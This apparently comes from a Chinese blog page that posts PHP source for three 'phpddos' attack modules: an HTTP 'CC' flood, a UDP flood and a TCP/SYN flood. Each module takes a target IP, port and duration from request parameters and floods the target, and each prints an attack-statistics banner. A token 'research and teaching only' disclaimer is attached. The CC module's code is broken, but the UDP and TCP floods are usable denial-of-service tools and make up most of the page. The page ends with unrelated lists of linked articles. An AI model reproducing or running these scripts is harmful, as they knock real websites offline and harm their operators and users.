网络安全向,请勿用作非法用途

CC攻击模块:

<?php
echo “状态 : 正常运行中…..<br>”;
echo “================================================<br>”;
echo ”  <font color=blue>www.phpddos.com<br>”;
echo ”  CC Flood 模块<br>”;
echo ”  作者:ybhacker<br>”;
echo ”  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
error_reporting(E_ALL);  //提示错误信息
set_time_limit(0);     //设定一个程式所允许执行的秒数   0 是无限循环
ob_implicit_flush();     // 刷新输出缓冲
$address = $_POST[‘site’];  // 网站地址
$port = $_POST[‘port’];      // 端口
$dongu = $_POST[‘dongu’];   //循环次数
$sayi = 1;
while ( $sayi <= $dongu )   //变量asyi小于 循环次数变量 dongu 才会继续循环
{
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
echo “HaHa\n”;
}
if (socket_bind($sock, $address, $port) === false) {       // 连接端口
echo “HaHa\n”;
}
if (socket_listen($sock, 5) === false) {
echo “HaHa\n”;
}
$msg = “HTTP/1.1 GET /\r\nHost:”+$_GET[‘site’]+”\r\nConnection: Keep-Alive\r\n”;
socket_write($msg);
socket_close($sock);
$sayi++;   // 循环一次 变量sayi 加1
echo “Goodbye…”.$sayi;   // 输出循环次数
}
?>

UDP攻击模块:

<?php
$packets = 0;
$ip = $_GET[‘ip’];
$port = $_GET[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[‘time’];
$time = time();
print “状态 : 正常运行中…..<br>”;
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= “phpddos”;
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“udp://$ip”, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo “================================================<br>”;
echo ”  <font color=blue>www.phpddos.com<br>”;
echo ”  作者:ybhacker<br>”;
echo ”  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
echo ”  攻击包总数:<font color=Red><span class=\”text\”>”.$packets.” 个数据包</span><br><br></font>”;
echo ”    攻击总流量:<font color=Red><span class=\”text\”>”.round(($packets*65*8)/(1024*1024),2).” Mbps</span><br><br></font>”;
echo ”  攻击总字节:<font color=Red><span class=\”text\”>”.time(‘h:i:s’).” 字节</span><br><br></font>”;
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” .round(($packets*65*8)/(1024*1024),2). ” Mbps) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>

TCP攻击模块:

<?php
ini_set(“display_errors”, “Off”);
$packets = 0;
$ip = $_GET[‘ip’];
$port = $_GET[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[‘time’];
$time = time();
print “状态 : 正常运行中…..<br>”;
$max_time = $time+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“tcp://$ip”, $port,$errno,$errstr,0);
}
echo “================================================<br>”;
echo ”  <font color=blue>www.phpddos.com<br>”;
echo ”  SYN Flood 模块<br>”;
echo ”  作者:ybhacker<br>”;
echo ”  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
echo ”  攻击包总数:<font color=Red><span class=\”text\”>”.$packets.” 个数据包</span><br><br></font>”;
echo ”    攻击总流量:<font color=Red><span class=\”text\”>”.round(($packets*65*8)/(1024*1024),2).” Mbps</span><br><br></font>”;
echo ”  攻击总字节:<font color=Red><span class=\”text\”>”.time(‘h:i:s’).” 字节</span><br><br></font>”;
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” .round(($packets*65*8)/(1024*1024),2). ” Mbps) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>

PHP DDOS的UDP攻击,TCP攻击,和CC攻击的核心代码的更多相关文章

  1. DDoS攻防战(二):CC攻击工具实现与防御理论

    我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量 ...

  2. DDoS攻防战 (二) :CC攻击工具实现与防御理论

    故上兵伐谋 其次伐交 其次伐兵 其下攻城 攻城之法 为不得已 知己知彼 百战不殆 不知彼而知己 一胜一负 不知彼不知己 每战必败 ——孙子兵法·谋攻 我们将要实现一个进行应用层DDoS攻击的工具,综合 ...

  3. DDoS攻防战(二):CC攻击工具实现与防御理论--删除

    我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量 ...

  4. DDoS攻防战 (四):CC攻击防御系统部署

    1. 系统效果 此DDOS应用层防御系统已经部署在了http://www.yfdc.org网站上(如果访问失败,请直接访问位于国内的服务器http://121.42.45.55进行在线测试). 此防御 ...

  5. ddos cc攻击简单介绍(转)

    何为syn flood攻击: SYN Flood是一种广为人知的DoS(拒绝服务攻击)是DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻 ...

  6. CC攻击与DDOS攻击区别

    二者的攻击方式主要分为三种:直接攻击.代理攻击.僵尸网络攻击 CC攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些.这种攻击你见不到虚假IP,见不到特别大的异常流 ...

  7. linux中防CC攻击两种实现方法(转)

    CC攻击就是说攻击者利用服务器或代理服务器指向被攻击的主机,然后模仿DDOS,和伪装方法网站,这种CC主要是用来攻击页面的,导致系统性能用完而主机挂掉了,下面我们来看linux中防CC攻击方法. 什么 ...

  8. 什么是CC攻击,如何防止网站被CC攻击的方法总汇

    CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一 ...

  9. 浅谈iptables防SYN Flood攻击和CC攻击

    ------------------------本文为自己实践所总结,概念性的东西不全,这里粗劣提下而已,网上很多,本文主要说下目前较流行的syn洪水攻击和cc攻击------------------ ...

  10. 网站防止CC攻击的方法

    CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一 ...

随机推荐

  1. 看看大神们是怎么解决一些【bng】的哪!!!!

    作者:姚冬  遇到bng的分享 我曾经做了两年大型软件的维护工作,那个项目有10多年了,大约3000万行以上的代码,参与过开发的有数千人,代码checkout出来有大约5个GB,而且bug特别多,op ...

  2. Jexus .Net at System.Net.Sockets.Socket.Connect (System.Net.IPAddress[] addresses, System.Int32 port)

    环境:Jexus(独立版)+MVC(5.2.3) +Redis+EF(6.0) Application Exception System.Net.Sockets.SocketException Con ...

  3. 如何迁移完整SQL数据库到另外一台服务器

    如何迁移完整SQL数据库到另外一台服务器: https://jingyan.baidu.com/album/9f7e7ec080d1b36f28155422.html?picindex=1

  4. POJ 1456 - Supermarket - [贪心+小顶堆]

    题目链接:http://poj.org/problem?id=1456 Time Limit: 2000MS Memory Limit: 65536K Description A supermarke ...

  5. [No000010B]Git4/9-时光机穿梭

    我们已经成功地添加并提交了一个readme.txt文件,现在,是时候继续工作了,于是,我们继续修改readme.txt文件,改成如下内容: Git is a distributed version c ...

  6. 使用Zookeeper命令的简单操作步骤

    (1) 使用ls命令查看当前Zookeeper中所包含的内容:ls / [zk: localhost:2181(CONNECTED) 1] ls / [zookeeper] [zk: localhos ...

  7. U3d 入门

    环境搭建: 1.安装exe; 2.破解 ,百度

  8. 《linux 用户管理》- useradd/userdel/usermod/groupadd/who/w

    一:概念 在 Linux 中,使用一个 32位整数 来记录每一个用户(USER ID 简单 UID),这意味着在 Linux 中,可以有 40亿 个不同的用户. 系统. 在 /etc/passwd  ...

  9. go get 的使用

    1.设置环境变量export GOPATH=/f/go_work2 2.go get github.com/xx

  10. ES6的十大新特性(转)

    add by zhj: 该文章是由国外一哥们写的,由腾讯前端团队翻译,图片中的妹子长得挺好看的,很养眼,嘿嘿.我目前在学习ES6,这篇文章把ES6的 几个主要新特性进行了归纳总结,犹如脑图一般,让人看 ...